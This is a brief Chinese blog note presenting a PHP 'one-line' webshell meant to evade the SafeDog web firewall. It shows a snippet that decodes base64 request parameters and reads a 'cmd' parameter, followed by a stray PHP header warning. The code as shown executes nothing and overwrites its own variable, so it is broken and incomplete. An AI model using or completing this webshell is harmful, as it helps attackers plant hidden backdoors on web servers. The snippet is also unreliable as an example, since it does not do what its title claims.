[笔记]PHP过狗一句话

四处搜刮,风雨飘摇

<?php
  $a = $_GET['a'];
  $b = $_GET['b'];
  $c = base64_decode($a).base64_decode($b);
  $c = $_REQUEST['cmd'];
?>
发表评论 / Comment

用心评论~


Warning: Cannot modify header information - headers already sent by (output started at /www/wwwroot/blog.dyboy.cn/content/templates/dyblog/footer.php:56) in /www/wwwroot/blog.dyboy.cn/include/lib/view.php on line 23